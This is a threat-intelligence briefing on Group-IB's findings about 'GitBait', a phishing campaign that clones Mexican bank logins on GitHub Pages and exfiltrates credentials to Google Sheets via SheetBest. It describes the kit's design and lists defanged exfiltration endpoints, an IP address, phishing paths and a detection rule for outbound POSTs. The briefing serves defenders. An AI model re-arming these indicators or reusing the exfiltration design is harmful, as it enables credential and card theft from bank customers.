Researchers at Group-IB have exposed a long-running phishing operation that turned GitHub's trusted infrastructure into a weapon against banking customers in Mexico, harvesting logins, card numbers, and customer IDs from people who believed they were on their bank's real website.
The campaign, which Group-IB calls GitBait, has been active for roughly three years and impersonates at least 12 financial institutions operating in Mexico. The operators built it on a fully serverless design: the phishing pages are hosted free on GitHub Pages, and stolen credentials are siphoned off through a legitimate cloud service rather than any server the attackers have to run themselves.
Why it matters
Because the pages live on github.io addresses, they inherit GitHub's reputation and automatic HTTPS, so they look trustworthy to victims and slip past simple domain blocklists. Group-IB counted more than 100 associated domains, each hosting multiple phishing pages, and found commit histories showing several operator accounts maintaining the kit continuously for over a year. It is part of a wider shift in which criminals lean on everyday cloud platforms instead of custom malware, much like other phishing-as-a-service operations that turn free tooling into mass fraud.
How the attack works
The operation runs from a modular phishing kit with an internal selector panel that lets the attackers spin up a page for whichever bank they want to target. Victims are likely lured in by SMS, messaging apps, or email, then walked through a cloned login flow that mimics the real bank, including a fake verification screen shown after they hand over their details to keep suspicion low.
Stolen data is intercepted by obfuscated JavaScript and sent in real time to the SheetBest API, a service that writes directly into Google Sheets, so the criminals collect everything in a spreadsheet without operating a back-end server. One variant instead shipped the data to a Telegram bot. To make malicious links look legitimate when shared in chat apps, the pages even carry crafted Open Graph preview tags, so a victim sees a trusted bank's name and logo in the link preview before tapping. The same instinct to abuse trusted developer platforms has surfaced in recent software supply-chain attacks.
What you should do
Group-IB urges banks to monitor GitHub for repositories impersonating their brand (watch for naming patterns like brand-soporte or brand-cancelacion) and to report them for takedown. Security teams should flag unexpected outbound POST requests to api.sheetbest[.]com from user web sessions, lean on behavioral detection rather than domain blocklists alone, and remind customers that a bank will never ask for card details or passwords through a link delivered by text or chat. The findings come from Group-IB's original research.
Indicators of compromise
Exfiltration endpoints included hxxps://api[.]sheetbest[.]com/sheets/f2958fbe-cdd7-4796-a4e4-19539d759a9f and several sibling sheet IDs, all resolving to 159[.]89[.]254[.]93. Phishing paths frequently used directories named /cancelacion, /soporte, and /mb1.
This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.